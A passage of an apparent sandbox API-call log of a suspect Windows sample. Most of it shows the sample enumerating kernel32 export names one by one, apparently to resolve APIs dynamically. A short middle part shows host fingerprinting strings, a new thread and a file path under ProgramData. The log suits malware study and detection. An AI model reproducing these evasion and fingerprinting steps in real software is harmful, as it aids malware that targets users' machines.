(lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0048.067] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0048.067] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0048.067] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0048.067] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0048.067] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0048.067] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0048.067] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0048.067] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0048.067] lstrlenA (lpString="BEEP") returned 4 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0048.067] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0048.067] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0048.067] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0048.067] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0048.068] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0048.068] lstrcpyA (in: lpString1=0xc986e4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0048.068] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0048.068] lstrcpyA (in: lpString1=0xc986e4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0048.068] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0048.068] lstrcpyA (in: lpString1=0xc986e4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0048.068] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0048.068] lstrcpyA (in: lpString1=0xc986e4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0048.068] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0048.068] lstrcpyA (in: lpString1=0xc986e4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0048.068] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0048.068] lstrcpyA (in: lpString1=0xc986e4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0048.068] lstrcpyA (in: lpString1=0xc986e4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0048.068] lstrcpyW (in: lpString1=0xc99394, lpString2="9cda09f29c354b42" | out: lpString1="9cda09f29c354b42") returned="9cda09f29c354b42" [0048.069] lstrcpyW (in: lpString1=0xc994b4, lpString2="XDUWTFONO" | out: lpString1="XDUWTFONO") returned="XDUWTFONO" [0048.069] lstrcpyW (in: lpString1=0xc9e6e4, lpString2="|C_F_497106/523979|" | out: lpString1="|C_F_497106/523979|") returned="|C_F_497106/523979|" [0048.069] lstrcpyW (in: lpString1=0xc9964c, lpString2="Windows 7 Professional" | out: lpString1="Windows 7 Professional") returned="Windows 7 Professional" [0048.070] lstrcpyW (in: lpString1=0xc99428, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0048.070] lstrcpyW (in: lpString1=0xc99540, lpString2="none|" | out: lpString1="none|") returned="none|" [0048.073] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x470000 [0048.074] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x4c0000 [0048.074] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x510000 [0048.074] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x520000 [0048.074] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x729c0, lpParameter=0x510000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0048.075] CloseHandle (hObject=0x1e4) returned 1 [0048.078] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x3b0004 | out: pszPath="C:\\ProgramData") returned 0x0 [0048.215] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\0x29A.db" | out: lpString1="C:\\ProgramData\\0x29A.db") returned="C:\\ProgramData\\0x29A.db" [0048.215] lstrlenA (lpString="kernel32.dll") returned 12 [0048.215] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0048.215] lstrcpyA (in: lpString1=0xc9d438, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0048.215] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0048.215] lstrcpyA (in: lpString1=0xc9d438, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0048.215] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0048.215] lstrcpyA (in: lpString1=0xc9d438, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0048.215] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0048.215] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0048.215] lstrlenA (lpString="ADDATOMA") returned 8 [0048.215] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0048.215] lstrlenA (lpString="ADDATOMW") returned 8 [0048.215] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0048.216] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0048.216] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0048.216] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0048.216] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0048.216] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0048.216] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0048.216] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0048.216] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0048.216] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0048.216] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0048.216] lstrcpyA (in: lpString1=0xc9d438, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0048.216] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0048.217] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0048.217] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0048.217] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0048.217] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0048.217] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0048.217] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0048.217] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0048.217] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0048.217] lstrlenA (lpString="BACKUPREAD") returned 10 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0048.217] lstrlenA (lpString="BACKUPSEEK") returned 10 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0048.217] lstrlenA (lpString="BACKUPWRITE") returned 11 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0048.217] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0048.217] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0048.217] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0048.218] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0048.218] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0048.218] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0048.218] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0048.218] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0048.218] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0048.218] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0048.218] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0048.218] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0048.218] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0048.218] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0048.218] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0048.218] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0048.218] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0048.218] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0048.219] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0048.219] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0048.219] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0048.219] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0048.219] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0048.219] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0048.219] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0048.219] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0048.219] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0048.219] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0048.219] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0048.219] lstrlenA (lpString="BEEP") returned 4 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0048.219] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0048.219] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0048.219] lstrcpyA (in: lpString1=0xc9d438, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0048.220] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0048.220] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0048.220] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0048.220] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0048.220] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0048.220] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0048.220] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0048.220] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0048.220] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0048.220] lstrlenA (lpString="CANCELIO") returned 8 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0048.220] lstrlenA (lpString="CANCELIOEX") returned 10 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0048.220] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0048.220] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0048.220] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0048.220] lstrcpyA (in: lpString1=0xc9d438, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0048.221] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0048.221] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0048.221] lstrlenA (lpString="CHECKELEVATION") returned 14 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0048.221] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0048.221] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0048.221] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0048.221] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0048.221] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0048.221] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0048.221] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0048.221] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0048.221] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0048.221] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0048.221] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0048.221] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0048.222] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0048.222] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0048.222] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0048.222] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0048.222] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0048.222] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0048.222] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0048.222] lstrcpyA (in: lpString1=0xc9d438, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0048.222] lstrlenA 